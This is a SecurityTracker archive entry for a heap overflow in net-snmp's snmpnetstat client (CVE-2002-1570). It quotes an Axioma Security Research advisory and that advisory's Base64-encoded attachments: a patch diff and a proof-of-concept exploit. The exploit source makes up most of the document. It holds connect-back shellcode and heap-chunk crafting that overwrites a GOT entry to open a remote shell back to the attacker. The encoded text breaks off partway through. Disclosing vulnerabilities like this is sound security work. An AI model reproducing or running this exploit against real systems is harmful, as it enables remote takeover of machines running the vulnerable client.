SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Net-snmp Vendors:   [Multiple Authors/Vendors]
Snmpnetstat Component of Net-snmp (ucd-snmp) Has Heap Overflow That Allows Remote Servers to Execute Arbitrary Code on the System
SecurityTracker Alert ID:  1003101
SecurityTracker URL:  http://securitytracker.com/id/1003101
CVE Reference:   CVE-2002-1570   (Links to External Site)
Updated:  Nov 8 2003
Original Entry Date:  Jan 3 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): snmpnetstat from ucd-SNMP-4.2.3
Description:   It is reported that there is a heap overflow in the snmpnetstat tool from the net-snmp (ucd-snmp) package. A remote server can cause arbitrary code to be executed by the snmpnetstat client.

It is reported that snmpnetstat allocates an array when requesting the list of interfaces. It then sends a getnextrequest PDU to the server requesting ifindex, ifaddr, and ifnetmask. If the ifindex value returned by server is different from the previously retrieved value and the interface currently being scanned is the last interface, the heap overflow vulnerability will be triggered and the memory located after the array will be overwritten with the variables returned by server.

The vendor has reportedly been notified.

A demonstration exploit is included in the Source Message (it is Base64-encoded).

Impact:   A remote user (snmp server) can cause arbitrary code to be executed on the host running net-snmp's snmpnetstat with the privileges of snmpnetstat.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided a potential patch, available in the Source Message (it is Base64-encoded).

Vendor URL:  www.net-snmp.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Nov 8 2003 (SCO Issues Fix for OpenLinux) Snmpnetstat Component of Net-snmp (ucd-snmp) Has Heap Overflow That Allows Remote Servers to Execute Arbitrary Code on the System
SCO has released a fix for OpenLinux.



 Source Message Contents

Subject:  Heap overflow in snmpnetstat


--=====_10100706846334=_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit            


              ----------------------------
                Axioma Security Research 
                    January 3, 2002
                    A D V I S O R Y
                 www.axiomasistemas.com
              ----------------------------

Platforms   : All
            : Tested on Red Hat Linux 7.1

Application : snmpnetstat from ucd-SNMP-4.2.3 (www.net-snmp.org)

Impact      : Remote access to the snmpnetstat client machine
 
 Overview
 --------

  snmpnetstat, a tool from ucd-snmp package, has a remotely exploitable
 heap overflow when parsing the server replies. A possible patch and a 
 proof of concept exploit are attached.

  
 Vendor status
 -------------

  Contacted
  

 Details
 -------

  When snmpnetstat request the list of interfaces, it first allocs an
 array to hold all the structs, one for each interface fetched. Then, it
 sends a getnextrequest PDU to the server requesting ifindex, ifaddr and
 ifnetmask, and saves this values in the first null entry of the array.
 Then it sends another getnextrequest PDU requesting ifindex, and some 
 other variables. If the ifindex value returned by server is different 
 from the one previusly fetched, and the interface currently being scanned
 is the last, the memory located after the array will be overwritten with
 the variables returned by server, causing a heap overflow.

  The research team of Axioma Sistemas has been able to exploit this flaw,
 providing a default offset for redhat 7.1. See atached exploit.

  Axioma Sistemas is unaware at this time if previous versions of snmpnetstat
 are affected by the vulnerability described in this advisory, but probably
 are.


 Recommendations
 ---------------

  Apply the patch attached or upgrade to the next release of Net-SNMP when 
 available


 Credits
 -------

  Axioma Security Research would like to thank Juan M. de la Torre
 (jmtorre@axiomasistemas.com) for discovering and researching this 
 vulnerability

-------------------
 About Axioma Sistemas

  Axioma is a leading security consultant for the Internet founded to help 
 corporations to improve their network security. With penetration tests and
 a high level of security assessment, Axioma is able to give to comercial 
 banks, telecommunication companies and much more customers, the security 
 they need.

  





--=====_10100706846334=_
Content-Type: application/octet-stream; name="snmp.diff"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="snmp.diff"

KioqIGFwcHMvc25tcG5ldHN0YXQvaWYuY19vbGQJVGh1IEphbiAgMyAxNDoy
NTowMCAyMDAyCi0tLSBhcHBzL3NubXBuZXRzdGF0L2lmLmMJVGh1IEphbiAg
MyAxNDoyNjoxNSAyMDAyCioqKioqKioqKioqKioqKiBpbnRwcihpbnQgaW50
ZXJ2YWwpCioqKiAyODAsMjg1ICoqKioKLS0tIDI4MCwyOTAgLS0tLQogIAkJ
ICAgIGNhc2UgSUZJTkRFWDoKICAJCQlpZmluZGV4ID0gKnZhci0+dmFsLmlu
dGVnZXI7CiAgCQkJZm9yIChjdXJfaWYgPSBpZl90YWJsZTsgY3VyX2lmLT5p
ZmluZGV4ICE9IGlmaW5kZXggJiYgY3VyX2lmLT5pZmluZGV4ICE9IDA7IGN1
cl9pZisrKSA7CisgCQkJaWYgKGN1cl9pZiA+PSAoaWZfdGFibGUgKyBjZmdf
bm5ldHMpKQorIAkJCXsKKyAJCQkJZnByaW50ZiAoc3RkZXJyLCAiSW5jb25z
aXN0ZW50IHJlcG9uc2UgZnJvbSBzZXJ2ZXIuIEFib3J0aW5nXG4iKTsKKyAJ
CQkJZXhpdCAoMCk7CisgCQkJfQogIAkJCWN1cl9pZi0+aWZpbmRleCA9IGlm
aW5kZXg7CiAgCQkJYnJlYWs7CiAgCQkgICAgY2FzZSBPVVRRTEVOOgo=

--=====_10100706846334=_
Content-Type: application/octet-stream; name="snmpx.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="snmpx.c"

Ci8qCiAqIFByb29mIG9mIGNvbmNlcHQgeHBsb2l0IGZvciBzbm1wbmV0c3Rh
dCAgCiAqCiAqICBUaGlzIGNhdXNlcyBzbm1wbmV0c3RhdCB0byBvdmVyd3Jp
dGUgdGhlIEdPVCBlbnRyeQogKiBvZiBlbmRwcm90b2VudCB3aXRoIHRoZSBh
ZGRyZXNzIG9mIGEgY29ubmVjdC1iYWNrCiAqIHNoZWxsY29kZS4gVGhlIHNo
ZWxsY29kZSBoYXMgc29tZSBzaXplIGxpbWl0YXRpb25zLgogKgogKiAgVVNF
IFRISVMgQVQgWU9VUiBPV04gUklTSwogKgogKiAgU2VuZCBjb21tZW50cyB0
byBKdWFuIE0uIGRlIGxhIFRvcnJlIC8gam10b3JyZUBheGlvbWFzaXN0ZW1h
cy5jb20KICogIGh0dHA6Ly93d3cuYXhpb21hc2lzdGVtYXMuY29tCiAqLwoK
I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1
ZGUgPHN0ZGFyZy5oPgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRl
IDxzeXMvc29ja2V0Lmg+CiNpbmNsdWRlIDxzeXMvcG9sbC5oPgojaW5jbHVk
ZSA8bmV0aW5ldC9pbi5oPgojaW5jbHVkZSA8YXJwYS9pbmV0Lmg+CiNpbmNs
dWRlIDxlcnJuby5oPgojaW5jbHVkZSA8c3RyaW5nLmg+CiNpbmNsdWRlIDx1
bmlzdGQuaD4KI2luY2x1ZGUgPG5ldGRiLmg+CiNpbmNsdWRlIDxnZXRvcHQu
aD4KCi8qCiAqIENvbnN0YW50cwogKi8KI2RlZmluZSBBU05fU0VRVUVOQ0Ug
ICAgICAweDEwCiNkZWZpbmUgQVNOX0NPTlNUUlVDVE9SICAgMHgyMAojZGVm
aW5lIEFTTl9JTlRFR0VSICAgICAgIDB4MDIKI2RlZmluZSBBU05fT0NURVRf
U1RSSU5HICAweDA0CiNkZWZpbmUgQVNOX0NPTlRFWFQgICAgICAgMHg4MAoj
ZGVmaW5lIEFTTl9PQkpFQ1RJRCAgICAgIDB4MDYKCiNkZWZpbmUgU05NUF9H
RVRSRVFVRVNUICAgICAoQVNOX0NPTlNUUlVDVE9SIHwgQVNOX0NPTlRFWFQp
CiNkZWZpbmUgU05NUF9HRVRORVhUUkVRVUVTVCAoQVNOX0NPTlNUUlVDVE9S
IHwgQVNOX0NPTlRFWFQgfCAweDEpCiNkZWZpbmUgU05NUF9HRVRSRVNQT05T
RSAgICAoQVNOX0NPTlNUUlVDVE9SIHwgQVNOX0NPTlRFWFQgfCAweDIpCgpl
bnVtIGV4cGxvaXRfc3RhdGVzIAp7IAoJU1RBVEVfTElTVEVOSU5HLCBTVEFU
RV9RVUlUVElORywgU1RBVEVfV0FJVElOR19HRVRORVhUMSwKCVNUQVRFX1dB
SVRJTkdfR0VUTkVYVDIsIFNUQVRFX1dBSVRJTkdfQ09OTkVDVAp9OwoKLyoK
ICogR2xvYmFscyAoSSBrbm93IGdsb2JhbHMgc3Vja3MsIGJ1dC4uLikKICov
CnN0YXRpYyBpbnQgc3RhdGU7CnN0YXRpYyBpbnQgc2Vzc2lvbl9pZDsKc3Rh
dGljIHN0cnVjdCBzb2NrYWRkcl9pbiBjbGllbnQ7CnN0YXRpYyB1bnNpZ25l
ZCBzaG9ydCBiaW5kcG9ydCA9IDMyMzQ7CnN0YXRpYyBpbnQgdXNlX2JpbmRf
YWRkciA9IDA7CnN0YXRpYyB1bnNpZ25lZCBsb25nIGJpbmRfYWRkcjsKCi8q
CiAqIDEwMSBieXRlcyBjb25uZWN0LWJhY2sgc2hlbGxjb2RlIAogICAgICAg
IHhvcmwgJWVheCwgJWVheAogICAgICAgIHB1c2hsICVlYXggICAgICAgICAg
ICAjIHB1c2ggSVBQUk9UT19JUAogICAgICAgIGluYyAlZWF4CiAgICAgICAg
cHVzaGwgJWVheCAgICAgICAgICAgICMgcHVzaCBTT0NLX1NUUkVBTQogICAg
ICAgIGluYyAlZWF4CiAgICAgICAgam1wIHNraXAKICAgICAgICBub3AKICAg
ICAgICBub3AKICAgICAgICBub3AKICAgICAgICBub3AKICAgICAgICBub3AK
ICAgICAgICBub3AKICAgICAgICBub3AKICAgICAgICBub3AKc2tpcDoKICAg
ICAgICBwdXNobCAlZWF4ICAgICAgICAgICAjIHB1c2ggQUZfSU5FVAogICAg
ICAgIG1vdmwgJWVzcCwgJWVjeAogICAgICAgIHhvcmwgJWVieCwgJWVieAog
ICAgICAgIG1vdmIgJDB4MSwgJWJsICAgICAgICMgU1lTX1NPQ0tFVAogICAg
ICAgIG1vdmIgJDEwMiwgJWFsICAgICAgICMgX19OUl9zb2NrZXRjYWxsCiAg
ICAgICAgaW50ICQweDgwCiAgICAgICAgbW92bCAlZWF4LCAlZWR4ICAgICAg
IyBzYXZlIGZkIGluIGVheCBhbmQgZWR4CiAgICAgICAgbW92YiAkMHgzLCAl
YmwgICAgICAgIyBTWVNfQ09OTkVDVAogICAgICAgIG1vdmwgJWVheCwgKCVl
YnApICAgICMgcHV0IGZkIGFzIGZpcnN0IGFyZ3VtZW50CiAgICAgICAgcHVz
aGwgJDB4MDEwMDAwN2YgICAgIyBmaWxsIHN0cnVjdCBzb2NrYWRkcl9pbgog
ICAgICAgIHB1c2hsICQweDAxMDEwMDAyCiAgICAgICAgbW92bCAlZXNwLCAw
eDQoJWVicCkKICAgICAgICBtb3ZiICQxNiwgJWFsICAgICAgICAjIHNpemVv
ZiBzdHJ1Y3Qgc29ja2FkZHJfaW4KICAgICAgICBtb3ZsICVlYXgsIDB4OCgl
ZWJwKQogICAgICAgIG1vdmwgJWVicCwgJWVjeAogICAgICAgIG1vdmIgJDEw
MiwgJWFsICAgICAgICMgX19OUl9zb2NrZXRjYWxsCiAgICAgICAgaW50ICQw
eDgwCiAgICAgICAgZGVjYiAlYmwgIyAlZWJ4IGNvbnRhaW5zICcyJwogICAg
ICAgIG1vdnpibCAlZGwsICVlY3gKbG9vcDE6CiAgICAgICAgbW92YiAkNiwg
JWFsICAgICAgICAgIyBfX05SX2Nsb3NlCiAgICAgICAgaW50ICQweDgwCiAg
ICAgICAgeGNoZ2IgJWNsLCAlYmwKICAgICAgICBtb3ZiICQ2MywgJWFsICAg
ICAgICAjIF9fTlJfZHVwMgogICAgICAgIGludCAkMHg4MAogICAgICAgIHhj
aGdiICVjbCwgJWJsCiAgICAgICAgZGVjYiAlYmwKICAgICAgICBqZ2UgbG9v
cDEKICAgICAgICBwdXNobCAkMHgwMDY4NzMyZgogICAgICAgIHB1c2hsICQw
eDZlNjk2MjJmCiAgICAgICAgbW92bCAlZXNwLCAlZWJ4CiAgICAgICAgeG9y
bCAlZWR4LCAlZWR4CiAgICAgICAgcHVzaGwgJWVkeAogICAgICAgIHB1c2hs
ICVlYngKICAgICAgICBtb3ZsICVlc3AsICVlY3gKICAgICAgICBtb3ZiICQw
eGIsICVhbCAgICAgICAjIF9fTlJfZXhlY3ZlCiAgICAgICAgaW50ICQweDgw
CiAqLwpzdGF0aWMgdV9jaGFyIHNoZWxsY29kZVtdID0gewogICAgICAgIDB4
MzEsIDB4YzAsIDB4NTAsIDB4NDAsIDB4NTAsIDB4NDAsIDB4ZWIsIDB4MDgs
IDB4OTAsIDB4OTAsIDB4OTAsCiAgICAgICAgMHg5MCwgMHg5MCwgMHg5MCwg
MHg5MCwgMHg5MCwgMHg1MCwgMHg4OSwgMHhlMSwgMHgzMSwgMHhkYiwgMHhi
MywKICAgICAgICAweDAxLCAweGIwLCAweDY2LCAweGNkLCAweDgwLCAweDg5
LCAweGMyLCAweGIzLCAweDAzLCAweDg5LCAweDQ1LAogICAgICAgIDB4MDAs
IDB4NjgsIDB4N2YsIDB4MDAsIDB4MDAsIDB4MDEsIDB4NjgsIDB4MDIsIDB4
MDAsIDB4MDEsIDB4MDEsCiAgICAgICAgMHg4OSwgMHg2NSwgMHgwNCwgMHhi
MCwgMHgxMCwgMHg4OSwgMHg0NSwgMHgwOCwgMHg4OSwgMHhlOSwgMHhiMCwK
ICAgICAgICAweDY2LCAweGNkLCAweDgwLCAweGZlLCAweGNiLCAweDBmLCAw
eGI2LCAweGNhLCAweGIwLCAweDA2LCAweGNkLAogICAgICAgIDB4ODAsIDB4
ODYsIDB4Y2IsIDB4YjAsIDB4M2YsIDB4Y2QsIDB4ODAsIDB4ODYsIDB4Y2Is
IDB4ZmUsIDB4Y2IsCiAgICAgICAgMHg3ZCwgMHhmMCwgMHg2OCwgMHgyZiwg
MHg3MywgMHg2OCwgMHgwMCwgMHg2OCwgMHgyZiwgMHg2MiwgMHg2OSwKICAg
ICAgICAweDZlLCAweDg5LCAweGUzLCAweDMxLCAweGQyLCAweDUyLCAweDUz
LCAweDg5LCAweGUxLCAweGIwLCAweDBiLAogICAgICAgIDB4Y2QsIDB4ODAK
fTsKCnN0YXRpYyB2b2lkIF9fYXR0cmlidXRlX18gKChub3JldHVybikpCmZh
dGFsICh1X2NoYXIgKmZtdCwgLi4uKQp7Cgl2YV9saXN0IGFwOwoKCXZhX3N0
YXJ0IChhcCwgZm10KTsKCXZmcHJpbnRmIChzdGRlcnIsIGZtdCwgYXApOwoJ
dmFfZW5kIChhcCk7CgoJZXhpdCAoRVhJVF9GQUlMVVJFKTsKfQoKLyoKICog
QVNOLjEgY29kZQogKi8Kc3RhdGljIHVfY2hhciAqCmFzbl9hcHBlbmRfbGVu
ICh1X2NoYXIgKnBrdCwgaW50IGxlbikKewoJaWYgKGxlbiA8PSAweDdmKQoJ
ewoJCS8qIHNob3J0IGxlbiAqLwoJCSpwa3QrKyA9ICh1X2NoYXIpIGxlbjsK
CQlyZXR1cm4gKHBrdCk7Cgl9CgoJaWYgKGxlbiA8PSAweGZmKQoJewoJCSpw
a3QrKyA9IDB4ODE7CgkJKnBrdCsrID0gKHVfY2hhcikgKGxlbik7CgkJcmV0
dXJuIChwa3QpOwoJfQoKCSpwa3QrKyA9IDB4ODI7CgkqcGt0KysgPSAodV9j
aGFyKSAoKGxlbiAmIDB4ZmYwMCkgPj4gOCk7CgkqcGt0KysgPSAodV9jaGFy
KSAobGVuICYgMHhmZik7CgoJcmV0dXJuIChwa3QpOwp9CgpzdGF0aWMgdV9j
aGFyICoKYXNuX2FwcGVuZF9zZXF1ZW5jZSAodV9jaGFyICpwa3QsIGludCBs
ZW4pCnsKCSpwa3QrKyA9IChBU05fU0VRVUVOQ0UgfCBBU05fQ09OU1RSVUNU
T1IpOwoJcGt0ID0gYXNuX2FwcGVuZF9sZW4gKHBrdCwgbGVuKTsKCXJldHVy
biAocGt0KTsKfQoKc3RhdGljIHVfY2hhciAqCmFzbl9hcHBlbmRfb2JqZWN0
aWQgKHVfY2hhciAqcGt0LCB1X2NoYXIgKnN0ciwgaW50IG5sZW4pCnsKCWlu
dCBpID0gMDsKCQoJKnBrdCsrID0gQVNOX09CSkVDVElEOwoJcGt0ID0gYXNu
X2FwcGVuZF9sZW4gKHBrdCwgbmxlbik7CgkKCXdoaWxlIChubGVuLS0pCgkJ
KnBrdCsrID0gc3RyW2krK107CgoJcmV0dXJuIChwa3QpOwp9CgpzdGF0aWMg
dV9jaGFyICoKYXNuX2FwcGVuZF9vY3RldF9zdHJpbmcgKHVfY2hhciAqcGt0
LCB1X2NoYXIgKnN0ciwgaW50IG5sZW4pCnsKCWludCBpID0gMDsKCQoJKnBr
dCsrID0gQVNOX09DVEVUX1NUUklORzsKCXBrdCA9IGFzbl9hcHBlbmRfbGVu
IChwa3QsIG5sZW4pOwoJCgl3aGlsZSAobmxlbi0tKQoJCSpwa3QrKyA9IHN0
cltpKytdOwoKCXJldHVybiAocGt0KTsKfQoKc3RhdGljIHVfY2hhciAqCmFz
bl9hcHBlbmRfaW50ZWdlciAodV9jaGFyICpwa3QsIHVuc2lnbmVkIGxvbmcg
biwgaW50IG5sZW4pCnsKCWlmIChubGVuICE9IDQgJiYgbmxlbiAhPSAyICYm
IG5sZW4gIT0gMSkKCQlmYXRhbCAoImVycm9yOiBiYWQgbmxlbiBpbiBhc25f
YXBwZW5kX2ludGVnZXIoKTogJWlcbiIsCgkJCQlubGVuKTsKCgkqcGt0Kysg
PSBBU05fSU5URUdFUjsKCSpwa3QrKyA9ICh1X2NoYXIpIChubGVuICYgMHhm
Zik7CgoJc3dpdGNoIChubGVuKQoJewoJY2FzZSAxOgoJCSpwa3QrKyA9ICh1
X2NoYXIpIChuICYgMHhmZik7CgkJYnJlYWs7CgoJY2FzZSAyOgoJCSpwa3Qr
KyA9ICh1X2NoYXIpICgobiAmIDB4ZmYwMCkgPj4gOCk7CgkJKnBrdCsrID0g
KHVfY2hhcikgKG4gJiAweGZmKTsKCQlicmVhazsKCQkKCWNhc2UgNDoKCQkq
cGt0KysgPSAodV9jaGFyKSAoKG4gJiAweGZmMDAwMDAwKSA+PiAyNCk7CgkJ
KnBrdCsrID0gKHVfY2hhcikgKChuICYgMHhmZjAwMDApID4+IDE2KTsKCQkq
cGt0KysgPSAodV9jaGFyKSAoKG4gJiAweGZmMDApID4+IDgpOwoJCSpwa3Qr
KyA9ICh1X2NoYXIpIChuICYgMHhmZik7CgkJYnJlYWs7Cgl9CgoJcmV0dXJu
IChwa3QpOwp9CgpzdGF0aWMgdV9jaGFyICoKYXNuX2dldF9vY3RldF9zdHJp
bmcgKHVfY2hhciAqcGt0LCB1X2NoYXIgKmRzdCkKewoJaW50IGxlbiwgaSA9
IDA7CgoJaWYgKCpwa3QrKyAhPSBBU05fT0NURVRfU1RSSU5HKQoJCWZhdGFs
ICgiZXJyb3I6IGVycm9yIHdoaWxlIHRhbGtpbmcgdG8gY2xpZW50XG4iKTsK
CglsZW4gPSAqcGt0Kys7CgoJd2hpbGUgKGxlbi0tKQoJCWRzdFtpKytdID0g
KnBrdCsrOwoKCXJldHVybiAocGt0KTsKfQoKc3RhdGljIHVfY2hhciAqCmFz
bl9nZXRfb2JqZWN0aWQgKHVfY2hhciAqcGt0LCB1X2NoYXIgKmRzdCkKewoJ
aW50IGxlbiwgaSA9IDA7CgoJaWYgKCpwa3QrKyAhPSBBU05fT0JKRUNUSUQp
CgkJZmF0YWwgKCJlcnJvcjogZXJyb3Igd2hpbGUgdGFsa2luZyB0byBjbGll
bnRcbiIpOwoKCWxlbiA9ICpwa3QrKzsKCgl3aGlsZSAobGVuLS0pCgkJZHN0
W2krK10gPSAqcGt0Kys7CgoJcmV0dXJuIChwa3QpOwp9CgpzdGF0aWMgdV9j
aGFyICoKYXNuX2dldF9pbnRlZ2VyICh1X2NoYXIgKnBrdCwgaW50ICpwZHN0
KQp7CglpbnQgbGVuLCBuYml0cywgZHN0OwoJCglpZiAoKnBrdCsrICE9IEFT
Tl9JTlRFR0VSKQoJCWZhdGFsICgiZXJyb3I6IGVycm9yIHdoaWxlIHRhbGtp
bmcgdG8gY2xpZW50XG4iKTsKCglsZW4gPSAqcGt0Kys7CglpZiAobGVuICE9
IDEgJiYgbGVuICE9IDIgJiYgbGVuICE9IDQpCgkJZmF0YWwgKCJlcnJvcjog
aW5jb3JyZW50IGludGVnZXIgbGVuIHJlY2VpdmVkIGZyb20gY2xpZW50XG4i
KTsKCQkKCXN3aXRjaCAobGVuKQoJewoJY2FzZSA0OgoJCW5iaXRzID0gMjQ7
IGJyZWFrOwoJY2FzZSAyOgoJCW5iaXRzID0gODsgYnJlYWs7CgljYXNlIDE6
CgkJbmJpdHMgPSAwOyBicmVhazsKCX0KCglkc3QgPSAwOwoJd2hpbGUgKGxl
bi0tKQoJewoJCWRzdCB8PSAoKCpwa3QrKykgPDwgbmJpdHMpOwoJCW5iaXRz
IC09IDg7Cgl9CgoJKnBkc3QgPSBkc3Q7CgoJcmV0dXJuIChwa3QpOwp9Cgpz
dGF0aWMgdW5zaWduZWQgbG9uZwpnZXRfc291cmNlX2FkZHIgKHN0cnVjdCBz
b2NrYWRkcl9pbiAqc19pbikKewoJaW50IHNkLCBzbGVuOwoJc3RydWN0IHNv
Y2thZGRyX2luIG1lOwoJCglpZiAoKHNkID0gc29ja2V0IChBRl9JTkVULCBT
T0NLX0RHUkFNLCBJUFBST1RPX1VEUCkpIDwgMCkKCQlmYXRhbCAoInNvY2tl
dCgpOiAlc1xuIiwgc3RyZXJyb3IgKGVycm5vKSk7CgkKCWlmIChjb25uZWN0
IChzZCwgKHN0cnVjdCBzb2NrYWRkciAqKSBzX2luLCBzaXplb2YgKHN0cnVj
dCBzb2NrYWRkcl9pbikpIDwgMCkKCQlmYXRhbCAoImNvbm5lY3QoKTogJXNc
biIsIHN0cmVycm9yIChlcnJubykpOwoKCXNsZW4gPSBzaXplb2YgKG1lKTsK
CWlmIChnZXRzb2NrbmFtZSAoc2QsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJm1l
LCAmc2xlbikgPCAwKQoJCWZhdGFsICgiZ2V0c29ja25hbWUoKTogJXNcbiIs
IHN0cmVycm9yIChlcnJubykpOwoKCWNsb3NlIChzZCk7CgkKCXJldHVybiAo
KHVuc2lnbmVkIGxvbmcpIG1lLnNpbl9hZGRyLnNfYWRkcik7Cn0KCnR5cGVk
ZWYgc3RydWN0CnsKCXVuc2lnbmVkIGxvbmcgcHNpemU7Cgl1bnNpZ25lZCBs
b25nIHNpemU7IC8qIDB4MSAtPiBQUkVWX0lOVVNFICovCgl1bnNpZ25lZCBs
b25nIGZkOwoJdW5zaWduZWQgbG9uZyBiazsKfSBjaHVua190OwoKI2RlZmlu
ZSBQUkVWX0lOVVNFIDB4MQoKc3RhdGljIHVfY2hhciAqCm1ha2VfZXZpbF9z
dHIgKGludCAqcGxlbikKewoJaW50IGxlbjsKCXN0YXRpYyB1X2NoYXIgYnVm
W0JVRlNJWl07CgljaHVua190ICpjOwoJdW5zaWduZWQgbG9uZyAqaXA7CQoJ
dW5zaWduZWQgc2hvcnQgKnBvcnQ7CgoJbWVtc2V0IChidWYsIDB4OTAsIEJV
RlNJWik7CgoJYyA9IChjaHVua190ICopIChidWYgLSA0KTsKCgkvKiBsZWF2
ZSBwc2l6ZSBvZiBmaXJzdCBjaHVuayB1bnVzZWQgKi8KCWMtPnNpemUgPSAw
eDE2VUw7CgljLT5mZCA9IDB4ODA3ZGJlODsKCWMtPmJrID0gMHg4MDUwZGYw
IC0gODsKCQoJYysrOwoJYy0+c2l6ZSA9IDBVTDsgLyogemVybyBQUkVWX0lO
VVNFIGJpdCAqLwoKCWxlbiA9IDEyICsgMTYgKyAxNCArIHNpemVvZiAoc2hl
bGxjb2RlKTsKCW1lbWNweSAoYnVmICsgMTYgKyA0LCBzaGVsbGNvZGUsIHNp
emVvZiAoc2hlbGxjb2RlKSk7CgoJaXAgPSAodW5zaWduZWQgbG9uZyAqKSAo
YnVmICsgMTYgKyA0ICsgMzUpOwoJKmlwID0gKHVzZV9iaW5kX2FkZHIgPyBi
aW5kX2FkZHIgOiBnZXRfc291cmNlX2FkZHIgKCZjbGllbnQpKTsKCglwb3J0
ID0gKHVuc2lnbmVkIHNob3J0ICopIChidWYgKyAxNiArIDQgKyA0Mik7Cgkq
cG9ydCA9IGh0b25zIChiaW5kcG9ydCk7CgoJKnBsZW4gPSBsZW47CglyZXR1
cm4gKGJ1Zik7Cn0KCi8qCiAqIFNOTVAgY29kZQogKi8Kc3RhdGljIHZvaWQK
c25tcF93YWl0aW5nX2dldG5leHQyIChpbnQgc2QsIHVfY2hhciAqYnVmKQp7
Cgl1X2NoYXIgKnB0ciA9IGJ1ZjsKCWludCB2ZXJzaW9uLCBmb287Cgl1X2No
YXIgY29tbVtCVUZTSVpdLCByZXNwW0JVRlNJWl07Cgl1X2NoYXIgb2lkc1sx
MV1bQlVGU0laXTsKCWludCBpLCBsZW4sIGV2aWxfc3RyX2xlbjsKCXVfY2hh
ciAqZXZpbF9zdHIgPSBOVUxMOwoKICAgICAgICBpZiAoKnB0cisrICE9IChB
U05fU0VRVUVOQ0UgfCBBU05fQ09OU1RSVUNUT1IpKQogICAgICAgICAgICAg
ICAgZmF0YWwgKCJlcnJvcjogcHJvdG9jb2wgZXJyb3JcbiIpOwoKICAgICAg
ICBwdHIgKz0gMjsKCiAgICAgICAgcHRyID0gYXNuX2dldF9pbnRlZ2VyIChw
dHIsICZ2ZXJzaW9uKTsKICAgICAgICBpZiAodmVyc2lvbiAhPSAwKQogICAg
ICAgICAgICAgICAgZmF0YWwgKCJlcnJvcjogY2xpZW50IHVzZXMgYSB2ZXJz
aW9uIGRpZmZlcmVudCBmcm9tIDBcbiIpOwoKICAgICAgICBtZW1zZXQgKGNv
bW0sIDAsIHNpemVvZiAoY29tbSkpOwogICAgICAgIHB0ciA9IGFzbl9nZXRf
b2N0ZXRfc3RyaW5nIChwdHIsIGNvbW0pOwoKICAgICAgICBpZiAoKnB0cisr
ICE9IFNOTVBfR0VUTkVYVFJFUVVFU1QpCiAgICAgICAgICAgICAgICBmYXRh
bCAoImVycm9yOiBwcm90b2NvbCBlcnJvclxuIik7CgogICAgICAgIHB0ciAr
PSAyOyAvKiBza2lwIGxlbiAqLwoKICAgICAgICBwdHIgPSBhc25fZ2V0X2lu
dGVnZXIgKHB0ciwgJnNlc3Npb25faWQpOwoKICAgICAgICBwdHIgPSBhc25f
Z2V0X2ludGVnZXIgKHB0ciwgJmZvbyk7CiAgICAgICAgcHRyID0gYXNuX2dl
dF9pbnRlZ2VyIChwdHIsICZmb28pOwoKICAgICAgICBpZiAoKnB0cisrICE9
IChBU05fU0VRVUVOQ0UgfCBBU05fQ09OU1RSVUNUT1IpKQogICAgICAgICAg
ICAgICAgZmF0YWwgKCJlcnJvcjogcHJvdG9jb2wgZXJyb3JcbiIpOwogICAg
ICAgIHB0ciArPSAyOwoKCWZvciAoaSA9IDA7IGkgPCAxMTsgaSsrKQoJewoJ
CWlmICgqcHRyKysgIT0gKEFTTl9TRVFVRU5DRSB8IEFTTl9DT05TVFJVQ1RP
UikpCgkJCWZhdGFsICgiZXJyb3I6IHByb3RvY29sIGVycm9yXG4iKTsKCQlw
dHIrKzsKCQlwdHIgPSBhc25fZ2V0X29iamVjdGlkIChwdHIsIG9pZHNbaV0p
OwoJCXB0ciArPSAyOwoJfQoKICAgICAgICBtZW1zZXQgKHJlc3AsIDAsIHNp
emVvZiAocmVzcCkpOwogICAgICAgIHB0ciA9IHJlc3A7CgkKCWV2aWxfc3Ry
ID0gbWFrZV9ldmlsX3N0ciAoJmV2aWxfc3RyX2xlbik7CgoJLyogY2FsY3Vs
YXRlIGxlbiBvZiB0aGUgcmVzcG9uc2UgKi8KCWxlbiA9IDMgKyAoMiArIHN0
cmxlbiAoY29tbSkpICsgNCArIDYgKyAzICsgMyArIDQ7CglsZW4gKz0gKDEx
ICogMTQpICsgNDAgKyBldmlsX3N0cl9sZW4gKyAyOwoKICAgICAgICBwdHIg
PSBhc25fYXBwZW5kX3NlcXVlbmNlIChwdHIsIGxlbik7CiAgICAgICAgcHRy
ID0gYXNuX2FwcGVuZF9pbnRlZ2VyIChwdHIsIDAsIDEpOwogICAgICAgIHB0
ciA9IGFzbl9hcHBlbmRfb2N0ZXRfc3RyaW5nIChwdHIsIGNvbW0sIHN0cmxl
biAoY29tbSkpOwogICAgIAoJKnB0cisrID0gU05NUF9HRVRSRVNQT05TRTsK
CS8qIGNhbGN1bGF0ZSBsZW4gb2YgdGhlIGdldHJlc3BvbnNlIFBEVSAqLwoJ
bGVuIC09ICgzICsgKDIgKyBzdHJsZW4gKGNvbW0pKSArIDQpOwoJcHRyID0g
YXNuX2FwcGVuZF9sZW4gKHB0ciwgbGVuKTsKCiAgICAgICAgcHRyID0gYXNu
X2FwcGVuZF9pbnRlZ2VyIChwdHIsIHNlc3Npb25faWQsIDQpOwogICAgICAg
IHB0ciA9IGFzbl9hcHBlbmRfaW50ZWdlciAocHRyLCAwLCAxKTsKICAgICAg
ICBwdHIgPSBhc25fYXBwZW5kX2ludGVnZXIgKHB0ciwgMCwgMSk7CgoJLyog
Y2FsY3VsYXRlIGxlbiBvZiBkYXRhICovCglsZW4gLT0gKDYgKyAzICsgMyAr
IDQpOwogICAgICAgIHB0ciA9IGFzbl9hcHBlbmRfc2VxdWVuY2UgKHB0ciwg
bGVuKTsKCglmb3IgKGkgPSAwOyBpIDwgMTE7IGkrKykKCXsKCQlsZW4gPSAx
MjsKCgkJb2lkc1tpXVs5XSsrOwoKCQlzd2l0Y2ggKG9pZHNbaV1bOF0pCgkJ
